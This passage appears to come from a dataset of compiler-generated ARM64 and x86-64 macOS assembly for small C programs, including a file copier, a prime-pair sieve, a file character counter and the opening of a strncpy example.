LBB11_5 LBB11_4: ## in Loop: Header=BB11_1 Depth=1 movq -24(%rbp), %rdi movl -8(%rbp), %esi callq _erase movq %rax, -24(%rbp) LBB11_5: ## in Loop: Header=BB11_1 Depth=1 movq -24(%rbp), %rdi callq _output jmp LBB11_1 LBB11_6: xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .comm __NIL,24,3 ## @_NIL .section __DATA,__data .globl _NIL ## @NIL .p2align 3 _NIL: .quad __NIL .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d [%d, %d]\n" L_.str.1: ## @.str.1 .asciz "%d%d" .section __DATA,__mod_init_func,mod_init_funcs .p2align 3 .quad _init_NIL .subsections_via_symbols
the_stack_data/54826465.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 sub sp, sp, #640 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] mov w8, #0 str w8, [sp, #36] ; 4-byte Folded Spill str wzr, [sp, #96] str w0, [sp, #92] str x1, [sp, #80] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov x9, sp add x8, sp, #356 str x8, [sp, #40] ; 8-byte Folded Spill str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF str x0, [sp, #24] ; 8-byte Folded Spill bl _scanf adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldr x0, [sp, #24] ; 8-byte Folded Reload mov x9, sp add x8, sp, #101 str x8, [x9] bl _scanf ldr w1, [sp, #36] ; 4-byte Folded Reload ldr x0, [sp, #40] ; 8-byte Folded Reload bl _open str w0, [sp, #76] ldr w8, [sp, #76] subs w8, w8, #0 cset w8, ge tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _perror mov w8, #-45 str w8, [sp, #96] b LBB0_12 LBB0_2: mov x9, sp mov x8, #438 str x8, [x9] add x0, sp, #101 mov w1, #1537 bl _open str w0, [sp, #72] ldr w8, [sp, #72] subs w8, w8, #0 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _perror mov w8, #-45 str w8, [sp, #96] b LBB0_12 LBB0_4: ldr w0, [sp, #76] sub x1, x29, #45 mov x2, #21 bl _read str x0, [sp, #64] str wzr, [sp, #60] b LBB0_5 LBB0_5: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #64] subs x8, x8, #0 cset w8, le tbnz w8, #0, LBB0_9 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=1 ldr w0, [sp, #72] ldr x2, [sp, #64] sub x1, x29, #45 bl _write str x0, [sp, #48] ldr x9, [sp, #48] ldrsw x8, [sp, #60] add x8, x8, x9 ; kill: def $w8 killed $w8 killed $x8 str w8, [sp, #60] ldr x8, [sp, #48] ldr x9, [sp, #64] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _perror mov w8, #-45 str w8, [sp, #96] b LBB0_12 LBB0_8: ; in Loop: Header=BB0_5 Depth=1 ldr w0, [sp, #76] sub x1, x29, #45 mov x2, #21 bl _read str x0, [sp, #64] b LBB0_5 LBB0_9: ldr x8, [sp, #64] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB0_11 b LBB0_10 LBB0_10: adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _perror mov w8, #-45 str w8, [sp, #96] b LBB0_12 LBB0_11: ldr w0, [sp, #76] bl _close ldr w0, [sp, #72] bl _close ldr w9, [sp, #60] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf str wzr, [sp, #96] b LBB0_12 LBB0_12: ldr w8, [sp, #96] str w8, [sp, #20] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_14 b LBB0_13 LBB0_13: bl ___stack_chk_fail LBB0_14: ldr w0, [sp, #20] ; 4-byte Folded Reload add sp, sp, #640 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Welcome to the File Copy Program by Stephanie Sechrist!\n" l_.str.1: ; @.str.1 .asciz "Enter the name of the file to copy from: \n" l_.str.2: ; @.str.2 .asciz "%s" l_.str.3: ; @.str.3 .asciz "Enter the name of the file to copy to: \n" l_.str.4: ; @.str.4 .asciz "Open file to be copied failed" l_.str.5: ; @.str.5 .asciz "Open file to be copied to failed" l_.str.6: ; @.str.6 .asciz "There was an error during copy" l_.str.7: ; @.str.7 .asciz "File Copy Successful, %d bytes copied\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $608, %rsp ## imm = 0x260 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -548(%rbp) movl %edi, -552(%rbp) movq %rsi, -560(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf leaq -288(%rbp), %rsi leaq L_.str.2(%rip), %rdi movb $0, %al callq _scanf leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf leaq -544(%rbp), %rsi leaq L_.str.2(%rip), %rdi movb $0, %al callq _scanf leaq -288(%rbp), %rdi xorl %esi, %esi movb $0, %al callq _open movl %eax, -564(%rbp) cmpl $0, -564(%rbp) jge LBB0_2 ## %bb.1: leaq L_.str.4(%rip), %rdi callq _perror movl $-45, -548(%rbp) jmp LBB0_12 LBB0_2: leaq -544(%rbp), %rdi movl $1537, %esi ## imm = 0x601 movl $438, %edx ## imm = 0x1B6 movb $0, %al callq _open movl %eax, -568(%rbp) cmpl $0, -568(%rbp) jge LBB0_4 ## %bb.3: leaq L_.str.5(%rip), %rdi callq _perror movl $-45, -548(%rbp) jmp LBB0_12 LBB0_4: movl -564(%rbp), %edi leaq -32(%rbp), %rsi movl $21, %edx callq _read movq %rax, -576(%rbp) movl $0, -580(%rbp) LBB0_5: ## =>This Inner Loop Header: Depth=1 cmpq $0, -576(%rbp) jle LBB0_9 ## %bb.6: ## in Loop: Header=BB0_5 Depth=1 movl -568(%rbp), %edi leaq -32(%rbp), %rsi movq -576(%rbp), %rdx callq _write movq %rax, -592(%rbp) movq -592(%rbp), %rcx movslq -580(%rbp), %rax addq %rcx, %rax ## kill: def $eax killed $eax killed $rax movl %eax, -580(%rbp) movq -592(%rbp), %rax cmpq -576(%rbp), %rax je LBB0_8 ## %bb.7: leaq L_.str.6(%rip), %rdi callq _perror movl $-45, -548(%rbp) jmp LBB0_12 LBB0_8: ## in Loop: Header=BB0_5 Depth=1 movl -564(%rbp), %edi leaq -32(%rbp), %rsi movl $21, %edx callq _read movq %rax, -576(%rbp) jmp LBB0_5 LBB0_9: cmpq $0, -576(%rbp) jge LBB0_11 ## %bb.10: leaq L_.str.6(%rip), %rdi callq _perror movl $-45, -548(%rbp) jmp LBB0_12 LBB0_11: movl -564(%rbp), %edi callq _close movl -568(%rbp), %edi callq _close movl -580(%rbp), %esi leaq L_.str.7(%rip), %rdi movb $0, %al callq _printf movl $0, -548(%rbp) LBB0_12: movl -548(%rbp), %eax movl %eax, -596(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_14 ## %bb.13: movl -596(%rbp), %eax ## 4-byte Reload addq $608, %rsp ## imm = 0x260 popq %rbp retq LBB0_14: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Welcome to the File Copy Program by Stephanie Sechrist!\n" L_.str.1: ## @.str.1 .asciz "Enter the name of the file to copy from: \n" L_.str.2: ## @.str.2 .asciz "%s" L_.str.3: ## @.str.3 .asciz "Enter the name of the file to copy to: \n" L_.str.4: ## @.str.4 .asciz "Open file to be copied failed" L_.str.5: ## @.str.5 .asciz "Open file to be copied to failed" L_.str.6: ## @.str.6 .asciz "There was an error during copy" L_.str.7: ## @.str.7 .asciz "File Copy Successful, %d bytes copied\n" .subsections_via_symbols
the_stack_data/132736.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _isPrime ; -- Begin function isPrime .p2align 2 _isPrime: ; @isPrime .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] str wzr, [sp, #8] mov w8, #2 str w8, [sp, #4] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_4 Depth 2 ldr w8, [sp, #4] ldr w9, [sp, #12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_10 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldrsw x9, [sp, #4] adrp x8, _isprime@PAGE add x8, x8, _isprime@PAGEOFF add x8, x8, x9 ldrb w8, [x8] ands w8, w8, #0x1 cset w8, ne tbnz w8, #0, LBB0_8 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #4] ldrsw x10, [sp, #8] adrp x9, _prime@GOTPAGE ldr x9, [x9, _prime@GOTPAGEOFF] str w8, [x9, x10, lsl #2] ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] ldr w8, [sp, #4] ldr w9, [sp, #4] add w8, w8, w9 str w8, [sp] b LBB0_4 LBB0_4: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp] ldr w9, [sp, #12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_7 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_4 Depth=2 ldrsw x9, [sp] adrp x8, _isprime@PAGE add x8, x8, _isprime@PAGEOFF add x9, x8, x9 mov w8, #1 strb w8, [x9] b LBB0_6 LBB0_6: ; in Loop: Header=BB0_4 Depth=2 ldr w9, [sp, #4] ldr w8, [sp] add w8, w8, w9 str w8, [sp] b LBB0_4 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB0_1 LBB0_10: ldr w0, [sp, #8] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _solve ; -- Begin function solve .p2align 2 _solve: ; @solve .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 adrp x10, _even@PAGE add x10, x10, _even@PAGEOFF adrp x8, _prime@GOTPAGE ldr x8, [x8, _prime@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill mov w8, #1 str w8, [x10, #32] mov w9, #4 str w9, [x10, #36] mov w9, #2 str w9, [x10, #40] str w9, [x10, #44] str w8, [sp, #28] b LBB1_1 LBB1_1: ; =>This Loop Header: Depth=1 ; Child Loop BB1_3 Depth 2 ldr w8, [sp, #28] subs w8, w8, #101 cset w8, ge tbnz w8, #0, LBB1_11 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #28] str w8, [sp, #24] b LBB1_3 LBB1_3: ; Parent Loop BB1_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x9, [sp, #8] ; 8-byte Folded Reload ldrsw x8, [sp, #28] ldr w8, [x9, x8, lsl #2] ldrsw x10, [sp, #24] ldr w9, [x9, x10, lsl #2] add w8, w8, w9 str w8, [sp, #20] ldr w8, [sp, #20] subs w8, w8, #100 cset w8, le tbnz w8, #0, LBB1_5 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 b LBB1_9 LBB1_5: ; in Loop: Header=BB1_3 Depth=2 ldr w8, [sp, #20] mov w9, #2 sdiv w9, w8, w9 ; implicit-def: $x8 mov x8, x9 sxtw x8, w8 lsl x9, x8, #4 adrp x8, _even@PAGE add x8, x8, _even@PAGEOFF ldr w8, [x8, x9] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB1_7 b LBB1_6 LBB1_6: ; in Loop: Header=BB1_3 Depth=2 ldr x8, [sp, #8] ; 8-byte Folded Reload ldr w9, [sp, #20] mov w11, #2 sdiv w10, w9, w11 ; implicit-def: $x9 mov x9, x10 sxtw x9, w9 lsl x12, x9, #4 adrp x9, _even@PAGE add x9, x9, _even@PAGEOFF mov w10, #1 str w10, [x9, x12] ldr w10, [sp, #20] ldr w12, [sp, #20] sdiv w12, w12, w11 add x12, x9, w12, sxtw #4 str w10, [x12, #4] ldrsw x10, [sp, #28] ldr w10, [x8, x10, lsl #2] ldr w12, [sp, #20] sdiv w12, w12, w11 add x12, x9, w12, sxtw #4 str w10, [x12, #8] ldrsw x10, [sp, #24] ldr w8, [x8, x10, lsl #2] ldr w10, [sp, #20] sdiv w10, w10, w11 add x9, x9, w10, sxtw #4 str w8, [x9, #12] b LBB1_7 LBB1_7: ; in Loop: Header=BB1_3 Depth=2 b LBB1_8 LBB1_8: ; in Loop: Header=BB1_3 Depth=2 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB1_3 LBB1_9: ; in Loop: Header=BB1_1 Depth=1 b LBB1_10 LBB1_10: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB1_1 LBB1_11: add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov w0, #100 bl _isPrime bl _solve mov w8, #2 stur w8, [x29, #-8] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-8] subs w8, w8, #51 cset w8, ge tbnz w8, #0, LBB2_7 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldursw x8, [x29, #-8] lsl x9, x8, #4 adrp x8, _even@PAGE add x8, x8, _even@PAGEOFF ldr w8, [x8, x9] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB2_4 b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 ldursw x10, [x29, #-8] adrp x8, _even@PAGE add x8, x8, _even@PAGEOFF mov x9, x8 add x9, x9, x10, lsl #4 ldr w9, [x9, #4] ; implicit-def: $x11 mov x11, x9 ldursw x10, [x29, #-8] mov x9, x8 add x9, x9, x10, lsl #4 ldr w9, [x9, #8] ; implicit-def: $x10 mov x10, x9 ldursw x9, [x29, #-8] add x8, x8, x9, lsl #4 ldr w9, [x8, #12] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x11, [x9] str x10, [x9, #8] str x8, [x9, #16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB2_5 LBB2_4: ldursw x9, [x29, #-8] adrp x8, _even@PAGE add x8, x8, _even@PAGEOFF add x8, x8, x9, lsl #4 ldr w9, [x8, #4] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB2_7 LBB2_5: ; in Loop: Header=BB2_1 Depth=1 b LBB2_6 LBB2_6: ; in Loop: Header=BB2_1 Depth=1 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB2_1 LBB2_7: mov w0, #0 ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _isprime ; @isprime .zerofill __DATA,__common,_isprime,101,0 .comm _prime,404,2 ; @prime .globl _even ; @even .zerofill __DATA,__common,_even,1600,2 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d %d %d\n" l_.str.1: ; @.str.1 .asciz "%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _isPrime ## -- Begin function isPrime .p2align 4, 0x90 _isPrime: ## @isPrime .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl $0, -8(%rbp) movl $2, -12(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_4 Depth 2 movl -12(%rbp), %eax cmpl -4(%rbp), %eax jg LBB0_10 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movslq -12(%rbp), %rcx leaq _isprime(%rip), %rax movb (%rax,%rcx), %al andb $1, %al movzbl %al, %eax cmpl $0, %eax jne LBB0_8 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -12(%rbp), %edx movslq -8(%rbp), %rcx movq _prime@GOTPCREL(%rip), %rax movl %edx, (%rax,%rcx,4) movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) movl -12(%rbp), %eax addl -12(%rbp), %eax movl %eax, -16(%rbp) LBB0_4: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -16(%rbp), %eax cmpl -4(%rbp), %eax jg LBB0_7 ## %bb.5: ## in Loop: Header=BB0_4 Depth=2 movslq -16(%rbp), %rcx leaq _isprime(%rip), %rax movb $1, (%rax,%rcx) ## %bb.6: ## in Loop: Header=BB0_4 Depth=2 movl -12(%rbp), %eax addl -16(%rbp), %eax movl %eax, -16(%rbp) jmp LBB0_4 LBB0_7: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_8 LBB0_8: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_9 LBB0_9: ## in Loop: Header=BB0_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB0_1 LBB0_10: movl -8(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _solve ## -- Begin function solve .p2align 4, 0x90 _solve: ## @solve .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $1, _even+32(%rip) movl $4, _even+36(%rip) movl $2, _even+40(%rip) movl $2, _even+44(%rip) movl $1, -4(%rbp) LBB1_1: ## =>This Loop Header: Depth=1 ## Child Loop BB1_3 Depth 2 cmpl $101, -4(%rbp) jge LBB1_11 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movl -4(%rbp), %eax movl %eax, -8(%rbp) LBB1_3: ## Parent Loop BB1_1 Depth=1 ## => This Inner Loop Header: Depth=2 movslq -4(%rbp), %rcx movq _prime@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %eax movslq -8(%rbp), %rdx movq _prime@GOTPCREL(%rip), %rcx addl (%rcx,%rdx,4), %eax movl %eax, -12(%rbp) cmpl $100, -12(%rbp) jle LBB1_5 ## %bb.4: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_9 LBB1_5: ## in Loop: Header=BB1_3 Depth=2 movl -12(%rbp), %eax movl $2, %ecx cltd idivl %ecx movslq %eax, %rcx leaq _even(%rip), %rax shlq $4, %rcx addq %rcx, %rax cmpl $0, (%rax) jne LBB1_7 ## %bb.6: ## in Loop: Header=BB1_3 Depth=2 movl -12(%rbp), %eax movl $2, %ecx cltd idivl %ecx movslq %eax, %rcx leaq _even(%rip), %rax shlq $4, %rcx addq %rcx, %rax movl $1, (%rax) movl -12(%rbp), %ecx movl -12(%rbp), %eax movl $2, %esi cltd idivl %esi movslq %eax, %rdx leaq _even(%rip), %rax shlq $4, %rdx addq %rdx, %rax movl %ecx, 4(%rax) movslq -4(%rbp), %rcx movq _prime@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %ecx movl -12(%rbp), %eax movl $2, %esi cltd idivl %esi movslq %eax, %rdx leaq _even(%rip), %rax shlq $4, %rdx addq %rdx, %rax movl %ecx, 8(%rax) movslq -8(%rbp), %rcx movq _prime@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %ecx movl -12(%rbp), %eax movl $2, %esi cltd idivl %esi movslq %eax, %rdx leaq _even(%rip), %rax shlq $4, %rdx addq %rdx, %rax movl %ecx, 12(%rax) LBB1_7: ## in Loop: Header=BB1_3 Depth=2 jmp LBB1_8 LBB1_8: ## in Loop: Header=BB1_3 Depth=2 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB1_3 LBB1_9: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_10 LBB1_10: ## in Loop: Header=BB1_1 Depth=1 movl -4(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) jmp LBB1_1 LBB1_11: popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl $100, %edi callq _isPrime callq _solve movl $2, -8(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 cmpl $51, -8(%rbp) jge LBB2_7 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movslq -8(%rbp), %rcx leaq _even(%rip), %rax shlq $4, %rcx addq %rcx, %rax cmpl $1, (%rax) jne LBB2_4 ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 movslq -8(%rbp), %rcx leaq _even(%rip), %rax shlq $4, %rcx addq %rcx, %rax movl 4(%rax), %esi movslq -8(%rbp), %rcx leaq _even(%rip), %rax shlq $4, %rcx addq %rcx, %rax movl 8(%rax), %edx movslq -8(%rbp), %rcx leaq _even(%rip), %rax shlq $4, %rcx addq %rcx, %rax movl 12(%rax), %ecx leaq L_.str(%rip), %rdi movb $0, %al callq _printf jmp LBB2_5 LBB2_4: movslq -8(%rbp), %rcx leaq _even(%rip), %rax shlq $4, %rcx addq %rcx, %rax movl 4(%rax), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf jmp LBB2_7 LBB2_5: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_6 LBB2_6: ## in Loop: Header=BB2_1 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB2_1 LBB2_7: xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _isprime ## @isprime .zerofill __DATA,__common,_isprime,101,4 .comm _prime,404,4 ## @prime .globl _even ## @even .zerofill __DATA,__common,_even,1600,4 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d %d %d\n" L_.str.1: ## @.str.1 .asciz "%d\n" .subsections_via_symbols
the_stack_data/34513299.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] str xzr, [sp, #24] ldur w8, [x29, #-8] subs w8, w8, #2 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldur x8, [x29, #-16] ldr x8, [x8] mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w0, #1 bl _exit LBB0_2: ldur x8, [x29, #-16] ldr x0, [x8, #8] adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _fopen mov x8, x0 str x8, [sp, #32] subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ldur x8, [x29, #-16] ldr x8, [x8, #8] mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf mov w0, #1 bl _exit LBB0_4: b LBB0_5 LBB0_5: ; =>This Inner Loop Header: Depth=1 ldr x0, [sp, #32] bl _getc stur w0, [x29, #-20] adds w8, w0, #1 cset w8, eq tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=1 ldur w0, [x29, #-20] adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] ldr x1, [x8] bl _putc ldr x8, [sp, #24] add x8, x8, #1 str x8, [sp, #24] b LBB0_5 LBB0_7: ldr x0, [sp, #32] bl _fclose ldur x8, [x29, #-16] ldr x10, [x8, #8] ldr x8, [sp, #24] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Usage: %s filename\n" l_.str.1: ; @.str.1 .asciz "r" l_.str.2: ; @.str.2 .asciz "Can't open %s\n" l_.str.3: ; @.str.3 .asciz "File %s has %lu characters\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) movq $0, -40(%rbp) cmpl $2, -8(%rbp) je LBB0_2 ## %bb.1: movq -16(%rbp), %rax movq (%rax), %rsi leaq L_.str(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _printf movl $1, %edi callq _exit LBB0_2: movq -16(%rbp), %rax movq 8(%rax), %rdi leaq L_.str.1(%rip), %rsi callq _fopen movq %rax, -32(%rbp) cmpq $0, %rax jne LBB0_4 ## %bb.3: movq -16(%rbp), %rax movq 8(%rax), %rsi leaq L_.str.2(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _printf movl $1, %edi callq _exit LBB0_4: jmp LBB0_5 LBB0_5: ## =>This Inner Loop Header: Depth=1 movq -32(%rbp), %rdi callq _getc movl %eax, -20(%rbp) cmpl $-1, %eax je LBB0_7 ## %bb.6: ## in Loop: Header=BB0_5 Depth=1 movl -20(%rbp), %edi movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rsi callq _putc movq -40(%rbp), %rax addq $1, %rax movq %rax, -40(%rbp) jmp LBB0_5 LBB0_7: movq -32(%rbp), %rdi callq _fclose movq -16(%rbp), %rax movq 8(%rax), %rsi movq -40(%rbp), %rdx leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Usage: %s filename\n" L_.str.1: ## @.str.1 .asciz "r" L_.str.2: ## @.str.2 .asciz "Can't open %s\n" L_.str.3: ## @.str.3 .asciz "File %s has %lu characters\n" .subsections_via_symbols
the_stack_data/192331075.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur wzr, [x29, #-24] adrp x8, l___const.main.s2@PAGE add x8, x8, l___const.main.s2@PAGEOFF ldr w9, [x8] add x1, sp, #32 str x1, [sp, #16] ; 8-byte Folded Spill str w9, [sp, #32] ldrh w8, [x8, #4] strh w8, [sp, #36] sub x0, x29, #18 str x0, [sp, #24] ; 8-byte Folded Spill mov x2, #2 mov x3, #10 bl ___strncpy_chk ldr x8, [sp, 